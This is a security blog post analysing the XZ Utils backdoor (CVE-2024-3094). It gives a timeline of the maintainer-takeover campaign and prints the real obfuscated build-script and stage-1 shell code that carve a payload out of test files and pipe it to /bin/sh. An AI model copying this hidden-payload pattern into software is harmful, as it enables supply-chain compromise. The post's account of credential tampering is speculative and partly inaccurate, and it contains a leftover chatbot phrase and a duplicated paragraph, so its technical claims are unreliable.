Emil Ahmadov 01 Apr 2024

XZ Backdoor: CVE-2024-3094

Introduction

Researchers unveiled the discovery of a backdoor intentionally embedded in xz Utils, an open-source data compression tool widely utilized across Linux and Unix-like operating systems. The individuals or group behind this project likely invested years into its development, bringing it perilously close to being incorporated into Debian and Red Hat, the two predominant Linux distributions. However, vigilant software developers detected something amiss before the backdoor update could be merged.

Description

The backdoor code resided within the compromised liblzma library, which handles file compression tasks. When an OpenSSH login attempt occurred, the server unknowingly used this malicious code during a routine decompression process. This provided the backdoor with a point of access to interfere with the authentication process.

Specifically, the malicious code targeted the memory space where the OpenSSH server (sshd) stored and processed authentication data. It monitored this data, looking for patterns that signified an ongoing user login attempt. This surveillance allowed it to precisely identify the right moment to intervene in the authentication process.

The backdoor then subtly tampered with the authentication data held in memory. This manipulation likely focused on altering the user-supplied credentials (like the password). The goal was to either weaken the original credentials such that they'd still bypass the server's validation check or possibly inject entirely fake credentials that the server would mistakenly accept.

Ultimately, this malicious meddling with the authentication process created a potential loophole for the attacker to gain unauthorized remote access to the system. This access could then be leveraged for data theft, malware deployment, or further compromise of the system.

Timeline of Events:

2021: JiaT75 creates a GitHub account. Their initial commits to other projects (like libarchive) are suspicious and potentially introduce vulnerabilities. This suggests early malicious intent.

2022: JiaT75 submits a seemingly innocuous patch to xz via email. A new persona, Jigar Kumar, pressures the project maintainer to merge it. Jigar Kumar and another similarly obscure account pressure the maintainer for more control within the project, then disappear. JiaT75 begins regularly contributing to xz, gaining trust over time.

2023: JiaT75 becomes a trusted maintainer in January. In March, they change the contact email for Google's oss-fuzz (a security testing system) to their own. They introduce changes to the codebase related to 'ifunc' implementation, potentially to obscure the backdoor they will later insert. 2024: JiaT75 influences the xz project URL within oss-fuzz and adds the final malicious code disguised as routine test files. This code is designed to exploit the OpenSSH server's authentication process.

This was a well-orchestrated, long-term attack. The threat actor meticulously built a position of trust within the open-source project.They strategically manipulated testing infrastructure to mask their malicious changes from detection.The attack targeted the xz compression library but had the potential to compromise systems using OpenSSH for remote login.Let me know if there are specific parts you'd like further rephrasing or if this level of detail is suitable!

This was a well-orchestrated, long-term attack. The threat actor meticulously built a position of trust within the open-source project. They strategically manipulated testing infrastructure to mask their malicious changes from detection. The attack targeted the xz compression library but had the potential to compromise systems using OpenSSH for remote login.

Discovery

Bash-Stage Obfuscation

Extracting & Executing the Hidden Payload Obfuscation of the initial payload begins within the m4/build-to-host.m4 file. Data is extracted from the test file tests/files/bad-3-corrupt_lzma2.xz.

 ...gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'...gl_path_map='tr "\t \-_" " \t_\-"'…

Simple byte-level character substitution (tr command) is performed to reverse intentional corruption of the file. This corruption likely aimed to disguise the payload as a harmless error. The restored xz stream is decompressed.

0x09 (\t) are replaced with 0x20,
0x20 (whitespace) are replaced with 0x09,0x2d (-) are replaced with 0x5f,
0x5f (_) are replaced with 0x2d,
This actually "uncorrupts" the bad-3-corrupt_lzma2.xz, which forms a proper xz stream again.

The payload was carefully hidden within a seemingly corrupt test file, demonstrating the attacker's emphasis on obfuscation.

This is merely the first stage of the backdoor. The Stage 1 script likely initiates further extraction, decryption, or execution of additional malicious code components.

Payload Segmentation & Extraction

####Hello##### a few binary bytes here, but as it's a comment they are ignorred[ ! $(uname) = "Linux" ] &&
 exit 0[ ! $(uname) = "Linux" ] && exit 0[ ! $(uname) = "Linux" ] && exit 0[ ! $(uname) = "Linux" ] &&
 exit 0[ ! $(uname) = "Linux" ] && exit 0eval grep ^srcdir= config.statusif test -f ../../config.status;
theneval grep ^srcdir= ../../config.statussrcdir="../../$srcdir"fiexport i="((head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && 
head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh####World###

The `head -c +1024 >/dev/null` command effectively discards the first 1024 bytes of the `good-large_compressed.lzma` file. These bytes likely contain dummy data or additional obfuscation.

The script alternates between:

Discarding 1024 bytes (head -c +1024 >/dev/null)
Extracting and passing the subsequent 2048 bytes to the next step for processing. Payload Structure: This suggests the malicious payload is strategically segmented across the file, interspersed with either filler data or further obfuscation to avoid detection.

Visual Analogy: The provided visual with 'noisy' areas representing payload data and 'empty gray' areas representing filler/obfuscation helps to understand the extraction process.

The deliberate segmentation of the payload within the file demonstrates the attacker's continued efforts to mask the malicious code. This step meticulously extracts the payload segments from within the file, preparing them for the next phase of the backdoor's execution.

Payload Decryption & Preparation

Isolating the Payload: The tail -c +31233 command (with a slight byte count variation between xz versions) removes the initial portion of the extracted data. This discarded section conceals the binary backdoor, which will be retrieved in a later stage.
Simple Decryption: The tr command functions as a basic substitution cipher. Different keys (byte mappings) are used for xz versions 5.6.0 and 5.6.1. This step reverses a layer of obfuscation applied to the payload.
Preparing for Execution:The decrypted data is decompressed (xz -F raw --lzma1 -dc), yielding the Stage 2 script. This script is immediately executed, advancing the backdoor's operation.

The initial portion of the segmented file is deliberately discarded, ensuring only the required payload remains for the next stage. A basic substitution cipher is used to conceal the payload. While simple, it demonstrates the attacker's continued efforts to mask their malicious code.

Stage Advancement: This process carefully prepares Stage 2 of the backdoor for execution.

Stage 2: Manipulating the Compilation Process

Core Payload: The Stage 2 operation primarily resides within the "infected.txt" file (specifically the 5.6.0 version). This bash script contains the code that manipulates the xz compilation process. Key Actions: Though the script would be complex, its likely actions include:

Extracting a .o File: A pre-compiled object file (libzlma.o) is likely hidden or embedded within the script. This object file probably contains the core malicious code for the backdoor.

Interfering with Compilation: The script modifies the compilation or linking process of xz. Forcing the inclusion of the malicious object file during linking. Altering build settings to enable the backdoor's functionality within the compiled xz binary.

The central goal of Stage 2 is to ensure that the malicious backdoor code is compiled directly into the xz binary. This allows the attacker's code to execute whenever the compromised xz utility is used, enabling unauthorized access through the OpenSSH vulnerability. Note: Embedding the malicious code within an object file allows it to blend seamlessly into the legitimate xz compilation process. The script manipulates the build process rather than directly replacing core xz files. This likely helps evade detection.

Please note: Without access to the actual "infected.txt" file, a more precise explanation is challenging.

Sophisticated Obfuscation: The attacker meticulously disguised the backdoor:

Payload hidden within test files.
Segmentation and file carving techniques to extract it.
Simple but effective substitution ciphers.
Multi-stage execution for heightened obscurity.
- Tool Ingenuity: Using standard command-line tools in a creative way demonstrates resourcefulness and potential to evade detection by many automated scanners.
- Extensibility: The backdoor's design hints at the possibility of future updates or additions without needing to modify the core test files, making it more adaptable.

The Unanswered Question: The discovery of this well-crafted attack poses a chilling question: if this was found by chance, what other hidden threats might still exist out there, lurking within seemingly innocent open-source code? This incident serves as a stark reminder of the following: The Importance of Vigilance: Even widely-used open-source software must be subjected to continuous scrutiny.

The Challenge of Detection: Sophisticated threat actors can craft attacks that blend seamlessly with legitimate code.
The Need for Proactive Security: Proactive review processes, contributor verification, and advanced detection tools are crucial to mitigate future risks in the open-source landscape.

Detection of mentioned vulnerability

https://github.com/FabioBaroni/CVE-2024-3094-checker/blob/main/CVE-2024-3094-checker.sh

References:

https://www.tenable.com/blog/frequently-asked-questions-cve-2024-3094-supply-chain-backdoor-in-xz-utils

https://boehs.org/node/everything-i-know-about-the-xz-backdoor

https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

https://www.helpnetsecurity.com/2024/03/29/cve-2024-3094-linux-backdoor/

https://gynvael.coldwind.pl/?lang=en&id=782